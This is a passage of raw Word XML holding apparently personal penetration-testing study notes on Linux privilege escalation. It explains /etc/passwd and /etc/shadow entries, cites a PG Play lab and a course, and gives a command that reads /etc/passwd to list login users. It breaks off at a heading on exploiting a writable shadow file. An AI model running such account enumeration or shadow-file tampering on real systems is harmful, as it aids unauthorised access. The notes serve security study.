        <w:t xml:space="preserve"> world-writable might seem unlikely, many organizations implement hybrid integrations with third-party vendors that may compromise security for easier usability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jdblocgvkwbc" w:id="412"/>
      <w:bookmarkEnd w:id="412"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="609600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="306" name="image301.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image301.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1026"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="609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E82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the last entry, apparently the "/" at the end of the hash password is not part of the hash, but it's part of /etc/passwd for organization, so ignore the slash at the end of hashed passwords stored in /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look for valid users in /etc/passwd, just look for the word "bash" since only valid users will have access to /bin/bash. All the other junk will not have access to it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd | grep bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd entry explained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe:x:1000:1000:joe,,,:/home/joe:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login Name: "joe" - Indicates the username used for login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted Password: "x" - This field typically contains the hashed version of the user's password. In this case, the value x means that the entire password hash is contained in the /etc/shadow file (more on that shortly).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID: "1000" - Aside from the root user that has always a UID of 0, Linux starts counting regular user IDs from 1000. This value is also called real user ID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GID: "1000" - Represents the user's specific Group ID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E97">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment: "joe,,," - This field generally contains a description about the user, often simply repeating username information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Home Folder: "/home/joe" - Describes the user's home directory prompted upon login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login Shell: "/bin/bash" - Indicates the default interactive shell, if one exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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9F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fwvju090ac18" w:id="413"/>
      <w:bookmarkEnd w:id="413"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3771900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="460" name="image448.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image448.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102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2EA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1028">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetDecoy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>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t xml:space="preserve">Here is the format of /etc/shadow entires:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1256"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username:password:last_change:min:max:warn:inactive:expire:reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passwords are likely in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA512 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">format as seen by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$6$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for example, in the first entry, we see root and a hashed password. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1155700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="468" name="image481.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image481.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1029"/>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2EAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see this output from Linux Smart Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can read /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sq5miv8yieyt" w:id="414"/>
      <w:bookmarkEnd w:id="414"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit /etc/shadow when you can write to it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Tib3rius Linux Priv Esc course. Video is Weak File Permissions </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2981325" cy="1647825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId423"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="29813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2EB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see from Linux Smart Enumeration that we can write to /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
